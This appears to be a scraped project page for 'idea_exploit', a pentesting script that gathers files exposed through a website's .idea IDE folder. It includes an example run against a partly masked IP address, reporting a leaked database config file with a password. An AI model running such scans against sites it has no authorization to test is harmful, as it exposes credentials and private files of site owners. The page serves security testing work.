Need help with idea_exploit?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

lijiejie
236 Stars 34 Forks 4 Commits 0 Opened issues

Description

Gather sensitive information from (.idea) folder for pentesters

Services available

!
?

Need anything else?

Contributors list

# 18,121
Python
2 commits
# 89
Python
robotfr...
apex
communi...
1 commit

.idea disclosure exploit

A script use .idea folder to gather sensitive information for pentesters .

Websites not correctly deployed let their IDE config folder (.idea) exposed to hacker,

which can lead password or archived data files leaked.

The scanner will try to download all files, please recheck local files by yourself.

Requirements

pip install lxml requests

Example

Our scanner reported a vulnerability this afternoon

scanner_pannel

As you can see, the file DbConnCfg.json leaked db password.

D:\IQIYI.codebase\idea_exp>idea_exp.py http://107.{mask}.{mask}.151/
[+] Module name is {mask}
[+] Type is web_module
[+] About 67 urls to process
[200] /cfg/DbConnCfg.json
[200] /bi/applepay/comm.php
[200] /bi/applepay/ipn_ios.php
[404] /auth/auth_ios/auth_guest.php
...
[200] /ver/ver_util.php
All files saved to 107.{mask}.{mask}.151/idea_exp_report.html

contain_password

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.